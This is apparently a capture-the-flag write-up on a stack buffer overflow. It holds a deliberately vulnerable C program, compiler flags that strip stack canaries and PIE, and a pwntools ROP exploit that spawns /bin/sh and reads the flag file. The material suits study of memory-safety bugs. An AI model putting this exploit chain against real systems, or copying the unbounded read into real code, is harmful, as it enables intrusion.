#### Source Code

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Intentionally vulnerable CTF target.
 * read() is allowed up to 0x90 (144) bytes but buf holds only 16, so the
 * excess overwrites the saved frame pointer and return address
 * (CWE-121, stack-based buffer overflow).  The one-line fix is to tie the
 * length to the buffer: read(0, buf, sizeof buf). */
int main() {
    char buf[16];
    puts("Pwn Me :)");
    fflush(stdout);
    read(0, buf, 0x90); /* length not bounded by sizeof buf */
    return 0;
}
```

#### Compile

```bash
# Each flag removes a mitigation that the exploit below depends on:
#   -fno-stack-protector  no stack canary, so the saved return address can be overwritten undetected
#   -no-pie               fixed load address, so the gadget addresses below are known in advance
#   -static               libc is linked into the binary, which is where the gadgets come from
# Building with the toolchain defaults (stack protector, PIE, dynamic linking) would break all three assumptions.
$ gcc roppy.c -fno-stack-protector -no-pie -static -o roppy
```

#### Exploit it

```py
from pwn import *

host = 'something'
port = something

r = remote(host, port)

# These addresses are valid only for this exact build of roppy and only
# because it is non-PIE and static; under PIE + ASLR they would not be fixed.
pop_rdi = 0x400686 # pop rdi ; ret
pop_rsi = 0x410093 # pop rsi ; ret
pop_rdx = 0x4494b5 # pop rdx ; ret
pop_rax = 0x415294 # pop rax ; ret
syscall = 0x474a65 # syscall ; ret
mov_rdi_rsi = 0x446c1b # mov qword ptr [rdi], rsi ; ret
bss = 0x6bb2e0

# No canary (-fno-stack-protector), so the padding runs straight into the
# saved return address and the ROP chain follows it.
p = 'a' * 0x18
p += p64(pop_rdi)
p += p64(bss)
p += p64(pop_rsi)
p += '/bin/sh\x00'
p += p64(mov_rdi_rsi)
p += p64(pop_rsi)
p += p64(0)
p += p64(pop_rdx)
p += p64(0)
p += p64(pop_rax)
p += p64(0x3b)
p += p64(syscall)

r.recvuntil('\n')  # wait for the "Pwn Me :)" prompt printed by puts()
r.send(p)
r.sendline('cat /home/flag.txt')
r.interactive()
```